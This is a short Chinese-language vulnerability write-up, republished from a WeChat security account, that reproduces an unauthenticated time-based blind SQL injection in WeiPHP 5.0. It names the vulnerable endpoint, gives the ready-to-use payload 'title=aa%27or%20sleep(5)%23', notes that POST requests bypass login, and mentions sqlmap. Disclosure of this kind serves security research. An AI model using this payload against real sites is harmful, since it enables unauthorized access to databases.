WeiPHP5.0 SQL注入漏洞1

admin 2022年4月28日09:45:08安全文章评论22 views600字阅读2分0秒阅读模式

本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。

漏洞描述

WeiPHP5.0是在2019年停止更新的一个系统,漏洞挺多的,跟着复现分析一下,这里复现一下 WeiPHP5.0的一处SQL注入漏洞

漏洞影响

WeiPHP5.0最新版

可以据此下载

https://www.weiphp.cn/doc/download_source_installation.html

漏洞复现

需要一个普通用户权限登录(好像也可以不用),然后访问链接并抓包

/index.php/material/Material/material_lists
title=aa%27or%20sleep(5)%23

不登录时需要使用 post ,如果使用 get会直接跳转,然后进行延时操作,注意右下角

WeiPHP5.0 SQL注入漏洞1
img

sqlmap

WeiPHP5.0 SQL注入漏洞1
img

总结

关于这个权限问题,实际上不用任何用户登录也是可以注入的,但必须使用 post的时候才可以。由于后面还有其他的数据库操作语句,这里只好使用盲注。

参考链接

  • https://igml.top/2019/10/30/weiphp5-0/

github 链接:https://github.com/N0puple/vulPOC

想要获取更多资讯,或者获取文中环境可以关注公众号 “安全漏洞复现”,回复 “漏洞环境”


原文始发于微信公众号(安全漏洞复现):WeiPHP5.0 SQL注入漏洞1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月28日09:45:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  WeiPHP5.0 SQL注入漏洞1 http://cn-sec.com/archives/953274.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: